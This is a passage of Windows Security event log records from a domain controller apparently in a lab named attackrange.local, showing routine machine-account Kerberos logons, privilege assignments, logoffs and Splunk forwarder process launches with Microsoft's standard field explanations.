Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:34:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263894
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x779E19
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.14
Source Port: 51626
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:34:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263893
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x779E19
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:34:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263892
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x779DD1
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 0
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:34:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263891
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x779DD1
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:34:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263890
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x779CE3
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 51625
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:34:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263889
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x779CE3
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:34:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263900
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b7c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:34:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263902
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1494
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:34:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263901
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x13f0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:34:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263903
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1894
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:34:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263904
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xf90
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:34:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263906
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1880
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:34:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263905
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x614
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:34:17 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263907
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x779E93
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:34:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263908
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b08
New Process Name: C:\Windows\System32\wermgr.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0x604
Creator Process Name: C:\Windows\System32\svchost.exe
Process Command Line: C:\Windows\system32\wermgr.exe -upload
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:34:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263911
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x77DD40
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:34:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263910
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x77DD40
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 51639
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:34:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263909
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x77DD40
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:35:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263913
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xf44
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:35:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263912
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1650
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:35:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263914
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x18ec
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:35:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263915
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x19f4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:35:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263916
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x14ec
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
